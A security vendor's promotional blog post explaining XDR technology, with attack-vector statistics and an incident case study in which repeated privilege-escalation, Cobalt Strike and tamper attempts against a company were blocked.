XDR – The Magic Word for Efficient Defence against Modern Cyber Attacks [Part 1]

The community of security experts bears more responsibility today than ever before. The dramatic increase in cyber attacks using ransomware and phishing calls for dynamic security strategies. Key here is the ability to recognise threats at an early stage and react immediately. With their centralised collection and AI-supported, behaviour-based analysis of data, XDR technologies offer a holistic solution. In this part you will learn how XDR works as an AI-supported technology, how it protects the most common attack vectors 24/7 and actively supports your Security Operation Center (SOC) from “detection” to “response” – vividly illustrated by a concrete IR case.

The Swiss Federal Office for Cybersecurity (BACS) has once again highlighted the dramatic increase in cyber attacks such as phishing and compromised user accounts. Regardless of company size and sector, Security Operation Centers (SOC) are required to identify security gaps in the IT infrastructure, offer comprehensive system protection and detect threats at an early stage. But that’s not all: with the rapid pace of technological progress, there is also a growing need to respond quickly and effectively to suspicious activities and security incidents and to return compromised IT systems to normal operation as quickly as possible. This is an enormous challenge for humans to manage – but with technological support, it no longer feels like magic.

Why is XDR the key to a successful defence?

Extended detection and response (XDR) offers a comprehensive solution by recognising attacks in a company’s digital assets and coordinating response measures. XDR technology thus provides security experts with a holistic view of the security situation.

The essence of XDR is that by implementing this AI-supported technology, endpoints, network traffic and user behaviour can be analysed holistically. By combining various analysis techniques, XDR platforms can recognise threats at an early stage and initiate automated responses that block or at least contain potential attacks. Because XDR takes account of the fact that cyber attackers are increasingly using automation and AI technologies, it makes sense for the defence tool to use the same technological methods.

The holistic and self-learning nature of XDR enables security teams to understand and respond to any type of threat across different vectors. This capability relieves the burden on the company’s SOC while also increasing the effectiveness of cyber defence.

MDR & XDR: central elements in cyber defence

In view of the constantly growing and increasingly complex threat situation, we’re now able to successfully fend off a comparatively high proportion of incidents thanks to self-learning, high-performance endpoint solutions such as managed detection and response (MDR) and extended detection and response (XDR).

The figures speak for themselves: with a 65 percent year-on-year increase in incidents in 2023, customers in around 48 percent of cases found themselves in a compromised but undamaged state. This is due on the one hand to better IT visibility and on the other to the technical support provided by XDR solutions, which are effective in slowing down potential attacks.

Figure 1: More powerful tools are successfully fending off increasing numbers of compromising incidents

The top three attack vectors and how XDR effectively fends them off

For those affected, a cyberattack scenario is like a storm that threatens to plunge everything into chaos – dramatically and scarily! But even in this storm, the stages of the attack follow a clear, (almost) standardised pattern: an attack always starts with what is termed initial access – the critical entry point.

Below we analyse the three entry points at the greatest risk (labelled A1 to A5 in Figure 2):

Figure 2: The most popular entry points and the threat landscape in a year-on-year comparison

1. Exposed vulnerabilities (A1-A2) remain among the targets with an increased risk of attack. In contrast to 2021, when 50 percent of incidents still occurred via exposed vulnerabilities, 2023 already saw this figure drop to 24 percent. This success is due to the increasing use of cloud-based SaaS services, which has greatly reduced the number of unpatched systems in companies. The analysis of these classic weak points leads us to conclude that attackers compromise the IT infrastructure and sometimes interact with these systems for several months before the actual attack. In this case, an XDR solution can prevent a potential attack, or at least quickly point out unusual activities such as exploit processes.
2. Another well-known method of attack is phishing (A3). Around 30 percent of the phishing simulations carried out by our pentesters were opened by employees the companies who commissioned the tests. It’s therefore hardly surprising that phishing attacks increased from 22 percent in 2021 to 27 percent in 2022, and rose yet further in 2023 by a worrying 46 percent. A key factor in the huge increase in phishing is the generative AI tools that are accessible to the masses. These make it possible to design higher-quality phishing campaigns that are difficult for users to recognise. If XDR solutions are installed, they proactively scan the IT systems for phishing attacks and automatically report suspicious activities to the SOC.
3. A tried-and-tested and still dangerous tactic in the phishing catalogue is the careless opening of unsafe websites (A4). Here, users are urged to download and execute malicious software. XDR monitors web traffic and identifies unsecured URLs. If a threat is suspected, the AI-based XDR system automatically isolates the website in question, examines its behaviour for a possible threat and sends a warning signal to your security team.
4. The supply chain (A5) represents a vulnerability in the area of cyber security that should not be underestimated. With a C-SCRM plan, companies can significantly protect themselves against cyber risks from insecure supply chains. To this end, they should regularly identify and assess their critical suppliers in order to minimise the associated risks and strengthen their resilience through a diversified supplier base.

Due to the high success rate of phishing, it makes sense to invest in awareness-raising measures:

1.    Sharing passwords and/or two-factor authentication codes

2.    Email attachments that contain malware

XDR offers excellent options for detecting and blocking malware infections on endpoints and responding in a targeted manner.

A case study from our CSIRT: successful defence against a persistent ransomware attacker using phishing

Let’s look at an example to examine the practical benefits of XDR. A company that manages the XDR stack internally was infiltrated by an attacker who deployed a successful phishing campaign to gain access to a user account. In this case, InfoGuard-CSIRT was tasked with performing a compromise assessment to retrospectively investigate the exact facts of the case.

Let’s have a look the details of the incident together:

24 February – first attempt at a local privilege escalation

As the company had not implemented multi-factor authentication, the attacker could easily access the company’s virtual desktop infrastructure (VDI). On 24 February, the attacker attempted to use an exploit published in October 2021 to extend their privileges. The XDR technology successfully blocked this attempt. The attacker withdrew – for the time being!

Figure 3: Exposed VDI without multi-factor authentication

4 May – another attack attempt using Cobalt Strike

About two-and-a-half months later, the attacker returned and launched a download of Cobalt Strike, an attacker framework for command-and-control activities. This attempt again failed due to the behaviour-based detection by XDR, which recognised the downloading of malicious files or downloads via unusual means such as PowerShell or bitsadmin as suspicious activity and blocked them. Despite further attempts to get the malware onto the system, XDR successfully prevented them all.

Figure 4: Renewed attack attempts via unusual download methods

22 June – the attacker does not give up – and fails again against XDR

The attacker returned on 22 June, presumably motivated by new ideas. After researching the web, they seem to have come across a blog article published in May that describes a method for enhancing privileges. The attacker launched the commands as described in the article, regardless of the fact that the target company’s environment was not akin to the infrastructure mentioned in the article. The XDR technology also successfully blocked this attempted attack.

Figure 5: A blog article serves as the basis for another attempt – without success!

July – exploit, Cobalt Strike and the unsuccessful attempt to uninstall Cortex XDR

On 5 July, the attacker attempted to uninstall the security software Cortex XDR and failed thanks to tamper protection. On 16 July, they used an exploit that had only been published two days earlier. The XDR solution also recognised and blocked this attack. The attacker still refused to give up and returned the next day. Once again they tried to attack with a Cobalt Strike – once again unsuccessfully!

Figure 6: Failed attempt to uninstall Cortex XDR

Figure 7: XDR blocks further attack attempts via exploits and Cobalt Strike

Conclusion: analysis of an (only just) unsuccessful cyber incident

The attacker was unable to cause any damage despite persistent attempts at an attack. It has to be said that the company was lucky: not only did the attacker behave in a relatively inexperienced manner, their activities were spread out across a longer timeline. Experience shows that attack attempts and successful intrusions are happening increasingly close together these days.

Without the XDR solution, the attack would have led to a successful ransomware compromise in February or March. After analysing and reconstructing the attack, our most urgent recommendation to the company was to implement multi-factor authentication to prevent future attacks.

This case illustrates how state-of-the-art, behaviour-based technologies such as the XDR solution successfully fend off potential attacks. At the same time, this example also emphasises the need for clear processes, established instructions and safety guidelines in order to be able to react appropriately to alerts.

How do XDR solutions optimise detection and response?

Let’s examine the basic components and functionalities of XDR systems and their integration into the corporate infrastructure.

Figure 8: Overview of the capabilities of an XDR stack

Basic XDR architecture and how it works

XDR systems can be sourced from various providers such as Microsoft, CrowdStrike and Palo Alto. A central element of this architecture is agent-based data acquisition. Agents fulfil two essential functions on the operating systems:

• Prevention through behaviour-based approaches: The agent-based technology offers behaviour-based prevention. This is crucial because attackers try to disguise malware by renaming system processes or masking themselves in some other way. Behaviour-based prevention identifies and blocks attacks by identifying unusual activities.
• Agent-based data delivery: Agents ensure reliable delivery of data to the XDR console. The console collects all data centrally in a data lake and uses it for further analyses.

Integration and data collection

Various data sources need to be integrated to obtain a complete overview of the security situation:

• Cloud solutions and API connections: Cloud services are usually integrated via APIs or through the incorporation of event data, extending data collection beyond the endpoints.
• Identity providers: The integration of identity providers, both in the cloud and on site (e.g. Active Directory), is essential for the management of identities and access protection.
• Log sources: XDR systems should integrate all relevant log sources, including firewall and mail systems as well as application systems. This data is normalised and stored centrally in the data lake.

Analytical, AI-based capabilities and ability to act

The XDR console offers extensive analytical functions that are enhanced by the data collected:

• Correlation and prioritisation: XDR systems correlate and group alerts to create a clearer picture of the situation. Alerting and prioritisation help to quickly identify and evaluate the relevant incidents.
• Extended visibility: The integration of all relevant data sources and the AI-supported analysis provide a comprehensive view of the attacker data and allow security teams to respond to threats in a targeted and effective manner.
• Introduction of containment measures: The XDR technology supports action measures. However, this often requires additional processes, such as resetting passwords.

Seamless embedding of XDR systems in your security strategy is a significant advantage for efficient cyber defence. This ensures that your Security Operation Center (SOC) is optimally positioned and meets the highest security standards 24/7.

“ISO 27001:2022”-certified consulting for a SOC at the highest level

Is your organisation focused on building a successful, centrally controllable cyber defence concept that supports your Security Operation Center (SOC) around the clock? You now know that you can hugely enhance the potential of your cyber defence with an XDR stack.  

We’ll be happy to support you with planning and concrete implementation. Our “ISO 27001:2022”-certified security experts will advise you on planning and concrete implementation and help you determine the most suitable XDR product for your IT environment.

Would you like to delve deeper into the topic of XDR?

If so, we strongly recommend our second article. You’ll learn how this technology optimises all phases of cyber defence and why a structured cyber defence journey with an XDR stack will make your company fit for the future. Of course, you can expect an exciting case study from the world of IR again in the second part.

Subscribe to our blog updates to receive the second part of this blog series conveniently in your mailbox.

Also for streaming: Ernesto Hartmann, Chief Cyber Defence Officer, and Sandro Bachmann, Senior Incident Responder, discussed how XDR can be used to effectively defend against cyber threats during an InfoGuard Security webcast. 

The recording of this webcast is available as a YouTube video. It's well worth listening to!

Caption: with Midjourney generated image